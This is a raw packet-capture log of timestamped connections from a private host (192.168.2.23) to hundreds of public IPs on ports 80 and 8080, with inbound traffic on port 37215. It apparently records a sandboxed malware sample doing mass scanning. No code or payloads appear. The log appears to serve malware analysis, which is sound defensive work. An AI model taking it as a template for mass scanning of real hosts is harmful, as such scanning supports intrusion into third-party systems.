Nov 22, 2023 08:37:52.864936113 CET	54328	80	192.168.2.23	95.228.240.55
Nov 22, 2023 08:37:52.864964008 CET	54328	80	192.168.2.23	95.187.54.40
Nov 22, 2023 08:37:52.864986897 CET	54328	80	192.168.2.23	95.222.32.84
Nov 22, 2023 08:37:52.865012884 CET	54328	80	192.168.2.23	95.106.139.20
Nov 22, 2023 08:37:52.865034103 CET	54328	80	192.168.2.23	95.27.6.64
Nov 22, 2023 08:37:52.865042925 CET	54328	80	192.168.2.23	95.174.177.39
Nov 22, 2023 08:37:52.865061998 CET	54328	80	192.168.2.23	95.48.105.69
Nov 22, 2023 08:37:52.865084887 CET	54328	80	192.168.2.23	95.164.116.136
Nov 22, 2023 08:37:52.865106106 CET	54328	80	192.168.2.23	95.233.65.170
Nov 22, 2023 08:37:52.865119934 CET	54328	80	192.168.2.23	95.231.68.121
Nov 22, 2023 08:37:52.865147114 CET	54328	80	192.168.2.23	95.106.0.206
Nov 22, 2023 08:37:52.865168095 CET	54328	80	192.168.2.23	95.9.10.77
Nov 22, 2023 08:37:52.865183115 CET	54328	80	192.168.2.23	95.65.228.178
Nov 22, 2023 08:37:52.865222931 CET	54328	80	192.168.2.23	95.104.75.6
Nov 22, 2023 08:37:52.865222931 CET	54328	80	192.168.2.23	95.120.30.8
Nov 22, 2023 08:37:52.865266085 CET	54328	80	192.168.2.23	95.114.27.224
Nov 22, 2023 08:37:52.865288973 CET	54328	80	192.168.2.23	95.199.145.81
Nov 22, 2023 08:37:52.865324020 CET	54328	80	192.168.2.23	95.1.129.94
Nov 22, 2023 08:37:52.865324974 CET	54328	80	192.168.2.23	95.205.199.100
Nov 22, 2023 08:37:52.865340948 CET	54328	80	192.168.2.23	95.180.101.247
Nov 22, 2023 08:37:52.865370035 CET	54328	80	192.168.2.23	95.236.122.236
Nov 22, 2023 08:37:52.865386963 CET	54328	80	192.168.2.23	95.240.77.252
Nov 22, 2023 08:37:52.865406990 CET	54328	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:52.865430117 CET	54328	80	192.168.2.23	95.39.70.104
Nov 22, 2023 08:37:52.865448952 CET	54328	80	192.168.2.23	95.133.101.126
Nov 22, 2023 08:37:52.865458965 CET	54328	80	192.168.2.23	95.103.13.9
Nov 22, 2023 08:37:52.865478992 CET	54328	80	192.168.2.23	95.195.10.51
Nov 22, 2023 08:37:52.865490913 CET	54328	80	192.168.2.23	95.56.23.86
Nov 22, 2023 08:37:52.865506887 CET	54328	80	192.168.2.23	95.209.65.204
Nov 22, 2023 08:37:52.865541935 CET	54328	80	192.168.2.23	95.187.226.192
Nov 22, 2023 08:37:52.865566969 CET	54328	80	192.168.2.23	95.27.104.185
Nov 22, 2023 08:37:52.865605116 CET	54328	80	192.168.2.23	95.105.123.108
Nov 22, 2023 08:37:52.865622997 CET	54328	80	192.168.2.23	95.109.102.176
Nov 22, 2023 08:37:52.865637064 CET	54328	80	192.168.2.23	95.65.111.165
Nov 22, 2023 08:37:52.865654945 CET	54328	80	192.168.2.23	95.126.207.17
Nov 22, 2023 08:37:52.865670919 CET	54328	80	192.168.2.23	95.74.205.197
Nov 22, 2023 08:37:52.865685940 CET	54328	80	192.168.2.23	95.37.33.15
Nov 22, 2023 08:37:52.865709066 CET	54328	80	192.168.2.23	95.243.239.28
Nov 22, 2023 08:37:52.865736008 CET	54328	80	192.168.2.23	95.60.148.253
Nov 22, 2023 08:37:52.865745068 CET	54328	80	192.168.2.23	95.64.86.193
Nov 22, 2023 08:37:52.865765095 CET	54328	80	192.168.2.23	95.126.188.146
Nov 22, 2023 08:37:52.865778923 CET	54328	80	192.168.2.23	95.153.170.125
Nov 22, 2023 08:37:52.865791082 CET	54328	80	192.168.2.23	95.10.19.123
Nov 22, 2023 08:37:52.865809917 CET	54328	80	192.168.2.23	95.33.145.3
Nov 22, 2023 08:37:52.865823030 CET	54328	80	192.168.2.23	95.68.237.190
Nov 22, 2023 08:37:52.865859985 CET	54328	80	192.168.2.23	95.246.114.62
Nov 22, 2023 08:37:52.865880013 CET	54328	80	192.168.2.23	95.193.118.24
Nov 22, 2023 08:37:52.865895987 CET	54328	80	192.168.2.23	95.159.215.45
Nov 22, 2023 08:37:52.865910053 CET	54328	80	192.168.2.23	95.156.9.254
Nov 22, 2023 08:37:52.865941048 CET	54328	80	192.168.2.23	95.247.241.13
Nov 22, 2023 08:37:52.865946054 CET	54328	80	192.168.2.23	95.239.36.54
Nov 22, 2023 08:37:52.865961075 CET	54328	80	192.168.2.23	95.65.38.85
Nov 22, 2023 08:37:52.865982056 CET	54328	80	192.168.2.23	95.239.124.19
Nov 22, 2023 08:37:52.866012096 CET	54328	80	192.168.2.23	95.13.146.83
Nov 22, 2023 08:37:52.866039991 CET	54328	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:52.866059065 CET	54328	80	192.168.2.23	95.191.120.255
Nov 22, 2023 08:37:52.866080999 CET	54328	80	192.168.2.23	95.253.8.71
Nov 22, 2023 08:37:52.866123915 CET	54328	80	192.168.2.23	95.233.181.248
Nov 22, 2023 08:37:52.866158962 CET	54328	80	192.168.2.23	95.254.190.163
Nov 22, 2023 08:37:52.866158962 CET	54328	80	192.168.2.23	95.113.14.59
Nov 22, 2023 08:37:52.866158962 CET	54328	80	192.168.2.23	95.165.22.53
Nov 22, 2023 08:37:52.866183043 CET	54328	80	192.168.2.23	95.234.214.208
Nov 22, 2023 08:37:52.866210938 CET	54328	80	192.168.2.23	95.231.28.211
Nov 22, 2023 08:37:52.866239071 CET	54328	80	192.168.2.23	95.148.219.165
Nov 22, 2023 08:37:52.866251945 CET	54328	80	192.168.2.23	95.245.162.196
Nov 22, 2023 08:37:52.866307020 CET	54328	80	192.168.2.23	95.39.228.118
Nov 22, 2023 08:37:52.866323948 CET	54328	80	192.168.2.23	95.132.10.22
Nov 22, 2023 08:37:52.866343021 CET	54328	80	192.168.2.23	95.65.21.62
Nov 22, 2023 08:37:52.866362095 CET	54328	80	192.168.2.23	95.190.170.8
Nov 22, 2023 08:37:52.866388083 CET	54328	80	192.168.2.23	95.242.74.117
Nov 22, 2023 08:37:52.866415977 CET	54328	80	192.168.2.23	95.195.84.255
Nov 22, 2023 08:37:52.866434097 CET	54328	80	192.168.2.23	95.232.169.136
Nov 22, 2023 08:37:52.866472960 CET	54328	80	192.168.2.23	95.157.90.242
Nov 22, 2023 08:37:52.866475105 CET	54328	80	192.168.2.23	95.166.40.91
Nov 22, 2023 08:37:52.866502047 CET	54328	80	192.168.2.23	95.102.113.155
Nov 22, 2023 08:37:52.866518021 CET	54328	80	192.168.2.23	95.244.136.152
Nov 22, 2023 08:37:52.866544962 CET	54328	80	192.168.2.23	95.241.141.54
Nov 22, 2023 08:37:52.866559982 CET	54328	80	192.168.2.23	95.85.85.144
Nov 22, 2023 08:37:52.866578102 CET	54328	80	192.168.2.23	95.187.161.51
Nov 22, 2023 08:37:52.866595030 CET	54328	80	192.168.2.23	95.201.251.34
Nov 22, 2023 08:37:52.866646051 CET	54328	80	192.168.2.23	95.240.246.148
Nov 22, 2023 08:37:52.866666079 CET	54328	80	192.168.2.23	95.119.106.215
Nov 22, 2023 08:37:52.866717100 CET	54328	80	192.168.2.23	95.1.149.42
Nov 22, 2023 08:37:52.866717100 CET	54328	80	192.168.2.23	95.192.227.111
Nov 22, 2023 08:37:52.866717100 CET	54328	80	192.168.2.23	95.71.71.202
Nov 22, 2023 08:37:52.866735935 CET	54328	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:52.866758108 CET	54328	80	192.168.2.23	95.50.41.189
Nov 22, 2023 08:37:52.866772890 CET	54328	80	192.168.2.23	95.105.130.76
Nov 22, 2023 08:37:52.866895914 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:52.881534100 CET	37215	54335	197.213.189.187	192.168.2.23
Nov 22, 2023 08:37:52.933279991 CET	37215	54335	197.130.39.49	192.168.2.23
Nov 22, 2023 08:37:53.045555115 CET	80	54328	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.045717001 CET	54328	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.055991888 CET	80	54328	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.056159019 CET	54328	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.058027983 CET	80	54328	95.217.144.242	192.168.2.23
Nov 22, 2023 08:37:53.058335066 CET	80	54328	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.058387041 CET	54328	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.060328007 CET	80	54328	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.060375929 CET	54328	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.064322948 CET	80	54328	95.234.241.251	192.168.2.23
Nov 22, 2023 08:37:53.071221113 CET	80	54328	95.251.55.72	192.168.2.23
Nov 22, 2023 08:37:53.071317911 CET	80	54328	95.111.72.202	192.168.2.23
Nov 22, 2023 08:37:53.084747076 CET	80	54328	95.133.101.126	192.168.2.23
Nov 22, 2023 08:37:53.100632906 CET	54329	8080	192.168.2.23	31.118.235.40
Nov 22, 2023 08:37:53.100636005 CET	54329	8080	192.168.2.23	95.219.253.196
Nov 22, 2023 08:37:53.100649118 CET	54329	8080	192.168.2.23	62.208.75.131
Nov 22, 2023 08:37:53.100668907 CET	54329	8080	192.168.2.23	95.75.109.80
Nov 22, 2023 08:37:53.100678921 CET	54329	8080	192.168.2.23	94.35.234.100
Nov 22, 2023 08:37:53.100682974 CET	54329	8080	192.168.2.23	94.6.108.113
Nov 22, 2023 08:37:53.100692034 CET	54329	8080	192.168.2.23	31.162.205.32
Nov 22, 2023 08:37:53.100702047 CET	54329	8080	192.168.2.23	62.80.110.187
Nov 22, 2023 08:37:53.100703001 CET	54329	8080	192.168.2.23	85.157.132.31
Nov 22, 2023 08:37:53.100702047 CET	54329	8080	192.168.2.23	94.57.54.53
Nov 22, 2023 08:37:53.100702047 CET	54329	8080	192.168.2.23	95.6.13.50
Nov 22, 2023 08:37:53.100708961 CET	54329	8080	192.168.2.23	62.240.83.79
Nov 22, 2023 08:37:53.100712061 CET	54329	8080	192.168.2.23	94.210.195.230
Nov 22, 2023 08:37:53.100725889 CET	54329	8080	192.168.2.23	31.252.239.197
Nov 22, 2023 08:37:53.100723982 CET	54329	8080	192.168.2.23	85.19.98.42
Nov 22, 2023 08:37:53.100723982 CET	54329	8080	192.168.2.23	95.60.206.115
Nov 22, 2023 08:37:53.100739956 CET	54329	8080	192.168.2.23	94.21.24.141
Nov 22, 2023 08:37:53.100744009 CET	54329	8080	192.168.2.23	94.165.60.212
Nov 22, 2023 08:37:53.100754023 CET	54329	8080	192.168.2.23	31.12.53.26
Nov 22, 2023 08:37:53.100754976 CET	54329	8080	192.168.2.23	31.119.65.230
Nov 22, 2023 08:37:53.100768089 CET	54329	8080	192.168.2.23	94.97.66.245
Nov 22, 2023 08:37:53.100771904 CET	54329	8080	192.168.2.23	95.204.41.132
Nov 22, 2023 08:37:53.100775957 CET	54329	8080	192.168.2.23	85.4.78.227
Nov 22, 2023 08:37:53.100775957 CET	54329	8080	192.168.2.23	31.54.68.132
Nov 22, 2023 08:37:53.100791931 CET	54329	8080	192.168.2.23	94.11.127.21
Nov 22, 2023 08:37:53.100804090 CET	54329	8080	192.168.2.23	31.54.129.100
Nov 22, 2023 08:37:53.100811005 CET	54329	8080	192.168.2.23	95.157.41.201
Nov 22, 2023 08:37:53.100811005 CET	54329	8080	192.168.2.23	85.87.168.125
Nov 22, 2023 08:37:53.100814104 CET	54329	8080	192.168.2.23	95.61.74.96
Nov 22, 2023 08:37:53.100830078 CET	54329	8080	192.168.2.23	62.124.24.196
Nov 22, 2023 08:37:53.100832939 CET	54329	8080	192.168.2.23	62.173.230.222
Nov 22, 2023 08:37:53.100836039 CET	54329	8080	192.168.2.23	85.217.106.153
Nov 22, 2023 08:37:53.100840092 CET	54329	8080	192.168.2.23	85.254.193.205
Nov 22, 2023 08:37:53.100845098 CET	54329	8080	192.168.2.23	31.184.137.15
Nov 22, 2023 08:37:53.100848913 CET	54329	8080	192.168.2.23	94.227.164.251
Nov 22, 2023 08:37:53.100864887 CET	54329	8080	192.168.2.23	62.25.154.58
Nov 22, 2023 08:37:53.100866079 CET	54329	8080	192.168.2.23	85.233.174.250
Nov 22, 2023 08:37:53.100873947 CET	54329	8080	192.168.2.23	31.150.162.139
Nov 22, 2023 08:37:53.100884914 CET	54329	8080	192.168.2.23	95.32.112.76
Nov 22, 2023 08:37:53.100888968 CET	54329	8080	192.168.2.23	95.6.217.66
Nov 22, 2023 08:37:53.100888968 CET	54329	8080	192.168.2.23	62.0.173.71
Nov 22, 2023 08:37:53.100894928 CET	54329	8080	192.168.2.23	62.55.170.135
Nov 22, 2023 08:37:53.100898981 CET	54329	8080	192.168.2.23	62.157.79.94
Nov 22, 2023 08:37:53.100900888 CET	54329	8080	192.168.2.23	94.192.123.177
Nov 22, 2023 08:37:53.100908995 CET	54329	8080	192.168.2.23	31.236.248.0
Nov 22, 2023 08:37:53.100912094 CET	54329	8080	192.168.2.23	85.193.246.47
Nov 22, 2023 08:37:53.100929022 CET	54329	8080	192.168.2.23	95.91.186.192
Nov 22, 2023 08:37:53.100930929 CET	54329	8080	192.168.2.23	31.157.250.31
Nov 22, 2023 08:37:53.100930929 CET	54329	8080	192.168.2.23	85.147.121.35
Nov 22, 2023 08:37:53.100936890 CET	54329	8080	192.168.2.23	94.122.222.63
Nov 22, 2023 08:37:53.100939035 CET	54329	8080	192.168.2.23	94.55.198.138
Nov 22, 2023 08:37:53.100948095 CET	54329	8080	192.168.2.23	31.49.232.116
Nov 22, 2023 08:37:53.100956917 CET	54329	8080	192.168.2.23	85.99.106.48
Nov 22, 2023 08:37:53.100959063 CET	54329	8080	192.168.2.23	85.80.39.219
Nov 22, 2023 08:37:53.100970030 CET	54329	8080	192.168.2.23	62.89.230.215
Nov 22, 2023 08:37:53.100992918 CET	54329	8080	192.168.2.23	85.169.28.213
Nov 22, 2023 08:37:53.100992918 CET	54329	8080	192.168.2.23	85.228.66.163
Nov 22, 2023 08:37:53.100992918 CET	54329	8080	192.168.2.23	85.11.204.176
Nov 22, 2023 08:37:53.100996017 CET	54329	8080	192.168.2.23	85.47.69.35
Nov 22, 2023 08:37:53.100996017 CET	54329	8080	192.168.2.23	94.33.219.38
Nov 22, 2023 08:37:53.100997925 CET	54329	8080	192.168.2.23	94.118.237.34
Nov 22, 2023 08:37:53.101013899 CET	54329	8080	192.168.2.23	62.99.19.201
Nov 22, 2023 08:37:53.101013899 CET	54329	8080	192.168.2.23	62.73.47.119
Nov 22, 2023 08:37:53.101027012 CET	54329	8080	192.168.2.23	95.220.101.13
Nov 22, 2023 08:37:53.101030111 CET	54329	8080	192.168.2.23	31.209.115.131
Nov 22, 2023 08:37:53.101037025 CET	54329	8080	192.168.2.23	95.138.247.253
Nov 22, 2023 08:37:53.101047039 CET	54329	8080	192.168.2.23	31.55.188.199
Nov 22, 2023 08:37:53.101047039 CET	54329	8080	192.168.2.23	62.111.30.251
Nov 22, 2023 08:37:53.101048946 CET	54329	8080	192.168.2.23	95.9.249.194
Nov 22, 2023 08:37:53.101053953 CET	54329	8080	192.168.2.23	94.12.131.255
Nov 22, 2023 08:37:53.101064920 CET	54329	8080	192.168.2.23	94.75.186.187
Nov 22, 2023 08:37:53.101070881 CET	54329	8080	192.168.2.23	95.242.134.127
Nov 22, 2023 08:37:53.101073027 CET	54329	8080	192.168.2.23	85.172.24.181
Nov 22, 2023 08:37:53.101073027 CET	54329	8080	192.168.2.23	62.139.60.137
Nov 22, 2023 08:37:53.101078987 CET	54329	8080	192.168.2.23	94.166.225.134
Nov 22, 2023 08:37:53.101083040 CET	54329	8080	192.168.2.23	62.3.102.50
Nov 22, 2023 08:37:53.101098061 CET	54329	8080	192.168.2.23	62.8.11.1
Nov 22, 2023 08:37:53.101099014 CET	54329	8080	192.168.2.23	94.239.67.62
Nov 22, 2023 08:37:53.101099014 CET	54329	8080	192.168.2.23	85.160.246.66
Nov 22, 2023 08:37:53.101118088 CET	54329	8080	192.168.2.23	94.97.63.136
Nov 22, 2023 08:37:53.101119995 CET	54329	8080	192.168.2.23	62.156.37.72
Nov 22, 2023 08:37:53.101120949 CET	54329	8080	192.168.2.23	85.78.48.116
Nov 22, 2023 08:37:53.101126909 CET	54329	8080	192.168.2.23	31.0.149.133
Nov 22, 2023 08:37:53.101128101 CET	54329	8080	192.168.2.23	62.40.134.150
Nov 22, 2023 08:37:53.101138115 CET	54329	8080	192.168.2.23	94.68.20.80
Nov 22, 2023 08:37:53.101146936 CET	54329	8080	192.168.2.23	94.24.196.231
Nov 22, 2023 08:37:53.101156950 CET	54329	8080	192.168.2.23	62.224.191.99
Nov 22, 2023 08:37:53.101160049 CET	54329	8080	192.168.2.23	62.254.140.191
Nov 22, 2023 08:37:53.101162910 CET	54329	8080	192.168.2.23	94.12.190.110
Nov 22, 2023 08:37:53.101176977 CET	54329	8080	192.168.2.23	85.82.65.177
Nov 22, 2023 08:37:53.101192951 CET	54329	8080	192.168.2.23	94.149.82.176
Nov 22, 2023 08:37:53.101197004 CET	54329	8080	192.168.2.23	31.40.189.197
Nov 22, 2023 08:37:53.101197004 CET	54329	8080	192.168.2.23	95.77.90.116
Nov 22, 2023 08:37:53.101207972 CET	54329	8080	192.168.2.23	94.156.78.149
Nov 22, 2023 08:37:53.101208925 CET	54329	8080	192.168.2.23	62.10.30.96
Nov 22, 2023 08:37:53.101208925 CET	54329	8080	192.168.2.23	31.201.125.210
Nov 22, 2023 08:37:53.101227045 CET	54329	8080	192.168.2.23	94.166.111.68
Nov 22, 2023 08:37:53.101227999 CET	54329	8080	192.168.2.23	94.138.170.74
Nov 22, 2023 08:37:53.101249933 CET	54329	8080	192.168.2.23	85.226.144.193
Nov 22, 2023 08:37:53.101253033 CET	54329	8080	192.168.2.23	31.74.55.11
Nov 22, 2023 08:37:53.101257086 CET	54329	8080	192.168.2.23	94.68.7.21
Nov 22, 2023 08:37:53.101257086 CET	54329	8080	192.168.2.23	31.51.206.28
Nov 22, 2023 08:37:53.101262093 CET	54329	8080	192.168.2.23	95.238.65.106
Nov 22, 2023 08:37:53.101265907 CET	54329	8080	192.168.2.23	31.98.49.25
Nov 22, 2023 08:37:53.101269007 CET	54329	8080	192.168.2.23	85.240.240.110
Nov 22, 2023 08:37:53.101269007 CET	54329	8080	192.168.2.23	94.38.190.200
Nov 22, 2023 08:37:53.101274014 CET	54329	8080	192.168.2.23	31.42.135.58
Nov 22, 2023 08:37:53.101278067 CET	54329	8080	192.168.2.23	94.27.234.47
Nov 22, 2023 08:37:53.101289988 CET	54329	8080	192.168.2.23	94.84.194.14
Nov 22, 2023 08:37:53.101306915 CET	54329	8080	192.168.2.23	62.65.166.162
Nov 22, 2023 08:37:53.101308107 CET	54329	8080	192.168.2.23	95.49.60.49
Nov 22, 2023 08:37:53.101310015 CET	54329	8080	192.168.2.23	31.223.242.3
Nov 22, 2023 08:37:53.101311922 CET	54329	8080	192.168.2.23	85.203.64.128
Nov 22, 2023 08:37:53.101316929 CET	54329	8080	192.168.2.23	62.245.27.36
Nov 22, 2023 08:37:53.101317883 CET	54329	8080	192.168.2.23	85.209.194.253
Nov 22, 2023 08:37:53.101321936 CET	54329	8080	192.168.2.23	94.223.242.206
Nov 22, 2023 08:37:53.101321936 CET	54329	8080	192.168.2.23	85.218.102.230
Nov 22, 2023 08:37:53.101332903 CET	54329	8080	192.168.2.23	95.22.56.115
Nov 22, 2023 08:37:53.101334095 CET	54329	8080	192.168.2.23	62.82.52.178
Nov 22, 2023 08:37:53.101345062 CET	54329	8080	192.168.2.23	62.172.247.204
Nov 22, 2023 08:37:53.101350069 CET	54329	8080	192.168.2.23	85.18.125.209
Nov 22, 2023 08:37:53.101362944 CET	54329	8080	192.168.2.23	85.53.61.122
Nov 22, 2023 08:37:53.101363897 CET	54329	8080	192.168.2.23	31.186.57.218
Nov 22, 2023 08:37:53.101371050 CET	54329	8080	192.168.2.23	62.39.150.240
Nov 22, 2023 08:37:53.101373911 CET	54329	8080	192.168.2.23	31.224.51.13
Nov 22, 2023 08:37:53.101382017 CET	54329	8080	192.168.2.23	85.195.190.194
Nov 22, 2023 08:37:53.101386070 CET	54329	8080	192.168.2.23	62.176.108.28
Nov 22, 2023 08:37:53.101387024 CET	54329	8080	192.168.2.23	85.25.138.113
Nov 22, 2023 08:37:53.101389885 CET	54329	8080	192.168.2.23	85.230.91.77
Nov 22, 2023 08:37:53.101394892 CET	54329	8080	192.168.2.23	31.155.116.53
Nov 22, 2023 08:37:53.101402998 CET	54329	8080	192.168.2.23	95.237.25.186
Nov 22, 2023 08:37:53.101411104 CET	54329	8080	192.168.2.23	85.212.165.11
Nov 22, 2023 08:37:53.101411104 CET	54329	8080	192.168.2.23	85.180.107.243
Nov 22, 2023 08:37:53.101416111 CET	54329	8080	192.168.2.23	95.204.8.135
Nov 22, 2023 08:37:53.101416111 CET	54329	8080	192.168.2.23	85.34.188.206
Nov 22, 2023 08:37:53.101423979 CET	54329	8080	192.168.2.23	95.81.25.241
Nov 22, 2023 08:37:53.101428032 CET	54329	8080	192.168.2.23	95.243.233.92
Nov 22, 2023 08:37:53.101429939 CET	54329	8080	192.168.2.23	62.163.4.229
Nov 22, 2023 08:37:53.101429939 CET	54329	8080	192.168.2.23	94.22.57.157
Nov 22, 2023 08:37:53.101438046 CET	54329	8080	192.168.2.23	94.225.142.84
Nov 22, 2023 08:37:53.101449013 CET	54329	8080	192.168.2.23	85.180.219.46
Nov 22, 2023 08:37:53.101454973 CET	54329	8080	192.168.2.23	95.74.22.4
Nov 22, 2023 08:37:53.101461887 CET	54329	8080	192.168.2.23	85.188.152.99
Nov 22, 2023 08:37:53.101464033 CET	54329	8080	192.168.2.23	85.217.67.23
Nov 22, 2023 08:37:53.101475000 CET	54329	8080	192.168.2.23	94.23.126.230
Nov 22, 2023 08:37:53.101475000 CET	54329	8080	192.168.2.23	85.196.140.65
Nov 22, 2023 08:37:53.101481915 CET	54329	8080	192.168.2.23	94.245.158.113
Nov 22, 2023 08:37:53.101485968 CET	54329	8080	192.168.2.23	95.66.231.36
Nov 22, 2023 08:37:53.101491928 CET	54329	8080	192.168.2.23	95.234.230.22
Nov 22, 2023 08:37:53.101497889 CET	54329	8080	192.168.2.23	94.251.171.38
Nov 22, 2023 08:37:53.101502895 CET	54329	8080	192.168.2.23	31.19.8.236
Nov 22, 2023 08:37:53.101510048 CET	54329	8080	192.168.2.23	85.172.32.156
Nov 22, 2023 08:37:53.101519108 CET	54329	8080	192.168.2.23	85.153.6.4
Nov 22, 2023 08:37:53.101520061 CET	54329	8080	192.168.2.23	95.114.67.24
Nov 22, 2023 08:37:53.101531029 CET	54329	8080	192.168.2.23	95.208.199.71
Nov 22, 2023 08:37:53.101536989 CET	54329	8080	192.168.2.23	94.125.89.222
Nov 22, 2023 08:37:53.101551056 CET	54329	8080	192.168.2.23	85.103.234.215
Nov 22, 2023 08:37:53.101557016 CET	54329	8080	192.168.2.23	85.11.113.97
Nov 22, 2023 08:37:53.101560116 CET	54329	8080	192.168.2.23	95.237.236.31
Nov 22, 2023 08:37:53.101560116 CET	54329	8080	192.168.2.23	31.22.160.15
Nov 22, 2023 08:37:53.101562023 CET	54329	8080	192.168.2.23	85.121.245.112
Nov 22, 2023 08:37:53.101562023 CET	54329	8080	192.168.2.23	95.167.189.110
Nov 22, 2023 08:37:53.101562977 CET	54329	8080	192.168.2.23	95.179.107.157
Nov 22, 2023 08:37:53.101579905 CET	54329	8080	192.168.2.23	95.254.251.102
Nov 22, 2023 08:37:53.101582050 CET	54329	8080	192.168.2.23	95.119.162.185
Nov 22, 2023 08:37:53.101591110 CET	54329	8080	192.168.2.23	31.200.174.28
Nov 22, 2023 08:37:53.101597071 CET	54329	8080	192.168.2.23	62.83.46.171
Nov 22, 2023 08:37:53.101612091 CET	54329	8080	192.168.2.23	62.125.185.18
Nov 22, 2023 08:37:53.101617098 CET	54329	8080	192.168.2.23	85.50.175.140
Nov 22, 2023 08:37:53.101618052 CET	54329	8080	192.168.2.23	95.66.168.138
Nov 22, 2023 08:37:53.101628065 CET	54329	8080	192.168.2.23	85.227.170.140
Nov 22, 2023 08:37:53.101634979 CET	54329	8080	192.168.2.23	94.207.154.50
Nov 22, 2023 08:37:53.101638079 CET	54329	8080	192.168.2.23	85.142.120.227
Nov 22, 2023 08:37:53.101643085 CET	54329	8080	192.168.2.23	31.167.246.103
Nov 22, 2023 08:37:53.101660967 CET	54329	8080	192.168.2.23	85.48.104.158
Nov 22, 2023 08:37:53.101660967 CET	54329	8080	192.168.2.23	95.179.170.148
Nov 22, 2023 08:37:53.101664066 CET	54329	8080	192.168.2.23	85.133.226.246
Nov 22, 2023 08:37:53.101684093 CET	54329	8080	192.168.2.23	85.143.215.98
Nov 22, 2023 08:37:53.101684093 CET	54329	8080	192.168.2.23	85.71.244.246
Nov 22, 2023 08:37:53.101685047 CET	54329	8080	192.168.2.23	31.250.34.120
Nov 22, 2023 08:37:53.101697922 CET	54329	8080	192.168.2.23	85.226.47.97
Nov 22, 2023 08:37:53.101699114 CET	54329	8080	192.168.2.23	62.191.122.18
Nov 22, 2023 08:37:53.101706982 CET	54329	8080	192.168.2.23	95.83.29.141
Nov 22, 2023 08:37:53.101711035 CET	54329	8080	192.168.2.23	94.227.189.34
Nov 22, 2023 08:37:53.101721048 CET	54329	8080	192.168.2.23	62.159.9.28
Nov 22, 2023 08:37:53.101727962 CET	54329	8080	192.168.2.23	95.225.124.28
Nov 22, 2023 08:37:53.101727962 CET	54329	8080	192.168.2.23	94.176.32.71
Nov 22, 2023 08:37:53.101731062 CET	54329	8080	192.168.2.23	95.66.14.57
Nov 22, 2023 08:37:53.101731062 CET	54329	8080	192.168.2.23	31.0.94.50
Nov 22, 2023 08:37:53.101746082 CET	54329	8080	192.168.2.23	31.3.252.65
Nov 22, 2023 08:37:53.101748943 CET	54329	8080	192.168.2.23	94.86.16.0
Nov 22, 2023 08:37:53.101752043 CET	54329	8080	192.168.2.23	62.223.58.57
Nov 22, 2023 08:37:53.101752043 CET	54329	8080	192.168.2.23	95.228.138.124
Nov 22, 2023 08:37:53.101766109 CET	54329	8080	192.168.2.23	31.177.102.71
Nov 22, 2023 08:37:53.101773024 CET	54329	8080	192.168.2.23	95.100.229.143
Nov 22, 2023 08:37:53.101789951 CET	54329	8080	192.168.2.23	31.106.167.168
Nov 22, 2023 08:37:53.101789951 CET	54329	8080	192.168.2.23	95.35.125.225
Nov 22, 2023 08:37:53.101798058 CET	54329	8080	192.168.2.23	95.181.74.31
Nov 22, 2023 08:37:53.101804972 CET	54329	8080	192.168.2.23	95.245.251.108
Nov 22, 2023 08:37:53.101804972 CET	54329	8080	192.168.2.23	31.63.107.240
Nov 22, 2023 08:37:53.101805925 CET	54329	8080	192.168.2.23	62.193.181.93
Nov 22, 2023 08:37:53.101811886 CET	54329	8080	192.168.2.23	94.83.39.223
Nov 22, 2023 08:37:53.101810932 CET	54329	8080	192.168.2.23	85.233.185.106
Nov 22, 2023 08:37:53.101811886 CET	54329	8080	192.168.2.23	95.27.11.70
Nov 22, 2023 08:37:53.101811886 CET	54329	8080	192.168.2.23	31.12.194.106
Nov 22, 2023 08:37:53.101824045 CET	54329	8080	192.168.2.23	85.88.38.26
Nov 22, 2023 08:37:53.101830959 CET	54329	8080	192.168.2.23	95.211.121.88
Nov 22, 2023 08:37:53.101843119 CET	54329	8080	192.168.2.23	95.175.128.46
Nov 22, 2023 08:37:53.101844072 CET	54329	8080	192.168.2.23	94.246.131.223
Nov 22, 2023 08:37:53.101856947 CET	54329	8080	192.168.2.23	85.65.234.213
Nov 22, 2023 08:37:53.101862907 CET	54329	8080	192.168.2.23	31.72.170.114
Nov 22, 2023 08:37:53.101864100 CET	54329	8080	192.168.2.23	62.137.222.77
Nov 22, 2023 08:37:53.101866961 CET	54329	8080	192.168.2.23	94.161.184.46
Nov 22, 2023 08:37:53.101871014 CET	54329	8080	192.168.2.23	31.10.103.146
Nov 22, 2023 08:37:53.101891994 CET	54329	8080	192.168.2.23	62.118.189.88
Nov 22, 2023 08:37:53.101893902 CET	54329	8080	192.168.2.23	62.77.253.126
Nov 22, 2023 08:37:53.101893902 CET	54329	8080	192.168.2.23	95.91.189.180
Nov 22, 2023 08:37:53.101897001 CET	54329	8080	192.168.2.23	31.124.24.131
Nov 22, 2023 08:37:53.101912022 CET	54329	8080	192.168.2.23	94.194.217.174
Nov 22, 2023 08:37:53.101917982 CET	54329	8080	192.168.2.23	85.86.205.40
Nov 22, 2023 08:37:53.101929903 CET	54329	8080	192.168.2.23	31.240.3.12
Nov 22, 2023 08:37:53.101929903 CET	54329	8080	192.168.2.23	95.236.168.34
Nov 22, 2023 08:37:53.101942062 CET	54329	8080	192.168.2.23	85.169.21.181
Nov 22, 2023 08:37:53.101948023 CET	54329	8080	192.168.2.23	31.169.4.177
Nov 22, 2023 08:37:53.101953983 CET	54329	8080	192.168.2.23	95.192.172.72
Nov 22, 2023 08:37:53.101953983 CET	54329	8080	192.168.2.23	31.17.7.218
Nov 22, 2023 08:37:53.101978064 CET	54329	8080	192.168.2.23	94.219.128.202
Nov 22, 2023 08:37:53.101979017 CET	54329	8080	192.168.2.23	85.0.200.198
Nov 22, 2023 08:37:53.101982117 CET	54329	8080	192.168.2.23	62.197.135.89
Nov 22, 2023 08:37:53.101982117 CET	54329	8080	192.168.2.23	94.0.40.147
Nov 22, 2023 08:37:53.101986885 CET	54329	8080	192.168.2.23	31.172.108.230
